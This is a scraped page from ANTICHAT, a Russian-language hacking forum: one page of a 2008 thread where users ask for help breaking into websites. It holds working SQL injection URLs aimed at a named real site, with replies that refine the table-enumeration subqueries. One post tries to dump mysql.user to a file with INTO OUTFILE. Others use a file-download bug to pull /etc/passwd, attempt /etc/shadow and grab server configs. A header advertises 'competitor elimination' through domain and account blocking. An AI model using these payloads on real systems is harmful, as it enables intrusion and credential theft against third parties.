УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 187 из 1393

187

Опции темы

Поиск в этой теме

Опции просмотра

#1861

30.04.2008, 20:22

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Indio какая СУБД интересует?
MSSQL: select TOP n column from table where column>'чето'
MYSQL: select column from table limit 20000,10
SYBASE: select TOP n START AT 20000 column from table
PostgreSQL: select column from table LIMIT 10 OFFSET 20000

__________________
Карфаген должен быть разрушен...

#1862

30.04.2008, 22:23

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Со скулей походу ниче не вышло,аблом =_=

Вот второй день уже маюсь,дошёл вот :

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+ information_schema.tables+where+table_name+not+in+ (0x276C6F67696E27,0x27647470726F7065727469657327))--

Почему дальше не идёт,не ужели всего две таблицы ?))

Последний раз редактировалось Велемир; 30.04.2008 в 22:32..

#1863

30.04.2008, 22:52

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Код:

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+1+table_name+from+information_schema.tables)))--

Код:

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+from+information_schema.tables+where+table_name+not+in+((select+all+top+2+table_name+from+information_schema.tables)))--

меняй число после top во втором подзапросе (который внутри where+table_name+not+in)

__________________
Карфаген должен быть разрушен...

#1864

01.05.2008, 00:19

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Пасип те большое))).И откуда ты только эти подзапросы откопал:Р

#1865

01.05.2008, 00:31

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

из манов, которые тебе давно пора начать читать

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#1866

01.05.2008, 15:55

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Я прочитал почти всё что только можно прочитать: (и маны читал по сто раз

#1867

02.05.2008, 14:36

На100ящий

Познающий

Регистрация: 10.01.2008

Сообщений: 43

Провел на форуме:
97223

Репутация: 5

Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>

Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(те� �ст+using+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs \\rail\\1.txt"/*

Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???

#1868

02.05.2008, 21:03

Vid0k

Постоянный

Регистрация: 24.12.2007

Сообщений: 574

Провел на форуме:
3186852

Репутация: 316

Отправить сообщение для Vid0k с помощью ICQ

нашел на сатйте бажный скрипт даунлоада фалов
скачал /etc/passwd все прошло норм
поробовал /etc/shadow
а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???

#1869

02.05.2008, 21:05

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

На100ящий, скорее всего, просто нет прав на запись в корень. Ищи папки с правами на запись.

Vid0k, не качал что там по ссылке, но предполагаю что тоже не хватает прав. На /etc/shadow права имеет только root, если систему ставили без кардинальных изменений

#1870

02.05.2008, 21:09

Vid0k

Постоянный

Регистрация: 24.12.2007

Сообщений: 574

Провел на форуме:
3186852

Репутация: 316

что можно еще попробовать нарыть
уже скачал error_log
httpd.conf
httpd-autoindex.conf
httpd-info.conf
httpd-mpm.conf
httpd-ssl.conf
httpd-vhosts.conf
ток ничо дельного не нашел ток юзерские диры
пытался скачать конфиг phpmyadmin но не выходит пишет мол ошибка
сам весь сайт на хтмл + пара скриптов на пхп
версия phpmyadmin 2.11.4

Последний раз редактировалось Vid0k; 02.05.2008 в 21:13..